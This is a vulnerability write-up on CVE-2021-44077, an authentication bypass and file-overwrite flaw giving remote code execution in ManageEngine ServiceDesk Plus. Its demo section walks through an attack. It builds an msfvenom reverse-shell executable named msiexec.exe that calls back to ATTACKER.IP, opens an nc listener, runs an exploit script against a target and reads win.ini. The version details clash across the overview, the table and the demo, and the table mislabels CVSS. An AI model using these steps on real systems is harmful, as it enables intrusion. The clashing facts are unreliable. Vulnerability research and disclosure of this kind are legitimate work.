CVE 2021-44077

# CVE 2021-44077 ## _Overview_ On September 16, 2021, the company ManageEngine (a subsidiary of Zoho) released version 11306 of ManageEngine ServiceDesk Plus to patch the vulnerability CVE-2021-44077. CVE-2021-44077 is an authentication bypass vulnerability affecting (on-premises) installations of ManageEngine ServiceDesk Plus using versions 11305 and earlier. The source of the vulnerability was an improper security configuration process used in ServiceDesk Plus, and it allowed attackers to gain unauthorized access to the application's data through several of its application URLs. **Detail** | | | | ----- | ----- | | CSV Score | 9.8 | | Severity| Critical | | Vector | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H | | Communication | SupportCenter Plus, ServiceDesk Plus MSP, ServiceDesk Plus | | Vulnerability type | Remote Code Execution | | Influence version | ServiceDesk Plus with versions 10527 till 10529; SupportCenter Plus with versions 11012 and 11013; ServiceDesk Plus MSP with versions 10527 till 10529. | | | | ## _Cause of vulnerability_ According to ManageEngine on the homepage, this is a vulnerability that bypasses authentication to upload arbitrary files. Use RestAPI to access the upload interface without authorization, upload a malicious `exe` file to the `/bin` directory to overwrite the original `exe` file, then use the program's own function to trigger executable `exe` just uploaded causing RCE. **RestAPI** The routing of the API interface in web.xml is as follows. <servlet-mapping> <servlet-name>action</servlet-name> <url-pattern>/RestAPI/*</url-pattern> </servlet-mapping> 1. The first is the RestAPI that is called when new software needs to be installed s247AgentInstallationProcess. ![](https://i.imgur.com/r7lAHTK.png) This RestAPI `s247AgentInstallationProcess` then calls an RestAPI `S247Util.installAgentProgress(apikey)` ![](https://i.imgur.com/BakxzVH.png) The main essence of this RestAPI is to call the Windows Installer msiexec.exe utility from the command line to install software installed with the Site24x7WindowsAgent.msi. Normally, the `msiexec.exe` utility of ManageEngine ServiceDesk Plus will be located at the path: `ManageEngine\ServicesDesk\bin`. And the command line structure to install that is: `C:\Program Files\ManageEngine\ServiceDesk\bin\msiexec.exe /i Site24x7WindowsAgent.msi EDITA1=apikey /qn` 2. Next we will analyze the file upload without input validation which the main cause here is RestAPI `ImportTechniciansAction`. ![](https://i.imgur.com/Vyfz079.png) With the `getTheFile()` function, RestApi will write files directly to the file without authentication. If the file already exists, the old file will be overwritten. Now if the attacker uploads a file named `msiexec.exe` then the old file in the system will be overwritten. After the attacker calls the API `s247AgentInstallationProcess`, the file `msiexec.exe` will be executed from which the attacker can RCE the victim machine. ## _Demo_ **Step1:** Download and install ManageEngine ServiceDesk Plus any from 11138 to 11145 or <11306. [Download here](http://archives.manageengine.com/service-desk/) > Before starting ManageEngine ServiceDesk Plus. > ![](https://i.imgur.com/4WQNkib.png) >After starting ManageEngine ServiceDesk Plus. >![](https://i.imgur.com/1ZxseEf.png) **Step2:** Use metasploit to proceed to create an application named `msiexec.exe`. > msfvenom -p windows/shell_reverse_tcp LHOST=`ATTACKER.IP` LPORT=`ATTACKER.PORT` -f exe > msiexec.exe ![](https://i.imgur.com/yZvkww3.png) With: |***-p**: payload to use* |***LHOST**: the attacker ip* |***LPORT**: the attacker port* |***-f**: output format* **Step3:** Create a script to send the file `msiexec.exe` to the victim's machine. ![](https://i.imgur.com/ASRYCPC.png) In the above code there are 2 events: - The application will first be sent to RestAPI `ImportTechniciansAction` to overwrite the file `msiexec.exe` ![](https://i.imgur.com/dTLipQL.png) - Next, we will call `Site24x7WindowsAgent` to automatically pry the file `msiexec.exe`. ![](https://i.imgur.com/N92coiq.png) **Step4:** Enable a listener on the attacker machine whose port is the same port as the metasploit payload. > nc -lvnp `ATTACKER.PORT` **Step5:** Deploy the attack to the victim's machine with the payload. > python3 exploit.py http://<TARGET_IP>:<PORT_HTTP_PROXY> <path_to_msiexec.exe> >![](https://i.imgur.com/8wy35m2.png) The attacker has successfully RCEed the victim's computer. ![](https://i.imgur.com/HhCQDYM.png) **Step6:** Attack to read the `win.ini` file of the victim machine. ![](https://i.imgur.com/5XUTv3H.png) ## _Reference_ - https://nvd.nist.gov/vuln/detail/CVE-2021-44077 - https://github.com/horizon3ai/CVE-2021-44077 - https://xz.aliyun.com/t/10631 - https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/msiexec